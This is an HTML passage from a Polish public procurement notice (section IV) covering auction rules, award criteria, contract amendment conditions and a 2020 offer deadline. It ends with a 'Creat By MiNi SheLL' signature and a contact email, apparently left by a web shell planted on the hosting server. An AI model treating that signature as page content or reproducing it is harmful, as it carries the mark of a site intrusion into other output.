id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena oferty brutto ( C )</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Przedłużenie minimalnego (60 miesięcznego) okresu gwarancji na roboty budowlane (G)</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin płatności faktury (T) </TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Z Wykonawcą, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający podpisze umowę w sprawie zamówienia publicznego.2. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, zobowiązany jest zawrzeć umowę w sprawie zamówienia publicznego na warunkach określonych w niniejszej siwz i złożonej ofercie oraz według wzoru dołączonego do niniejszej siwz.3. Wzór umowy, jaka zostanie zawarta w sprawie niniejszego postępowania określa załączniki nr 3 do siwz.4. Zamawiający przewiduje możliwość wprowadzenia następujących zmian i warunków ich wprowadzenia w zawartej umowie w sprawie zamówienia publicznego:a) Zmiana zakresu przedmiotu umowy, wartości umowy lub terminu wykonania w przypadku zadziałania siły wyższej, w zakresie adekwatnym do charakteru siły wyższej.b) Zmiana sposobu korzystania z mediów na potrzeby robót budowlanych. Wykonawca ma prawo najpóźniej w dniu przekazania placu budowy oświadczyć o rezygnacji z skorzystania z dostarczonych przez Zamawiającego mediów i w uzgodniony z Zamawiającym sposób korzystać z własnych źródeł dostarczania mediów. c) W przypadku wejścia w życie przepisów prawa, których uchwalenie nastąpiło po terminie składania ofert określonym w § 13 pkt. 1 lit. a oraz pkt. 2 lit. a w niniejszej siwz, których zapisy mają istotny wpływ na realizację zamówienia, strony mogą wprowadzić w zawartej umowie zmiany uwzględniające nowe przepisy w stopniu adekwatnym do wpływu nowych przepisów na pozostałą do zrealizowania część zamówienia.d) Zmiana osób odpowiedzialnych za realizację umowy określonych w zawartej umowie, zarówno ze strony Wykonawcy jak i Zamawiającego, w przypadku zaistnienia uzasadnionych zdarzeń prowadzących do takiej zmiany, pod warunkiem, że osoby zastępujące posiadały będą co najmniej równoważne kwalifikacje w zakresie realizacji umowy, jak osoby zastępowane.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-07-31</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com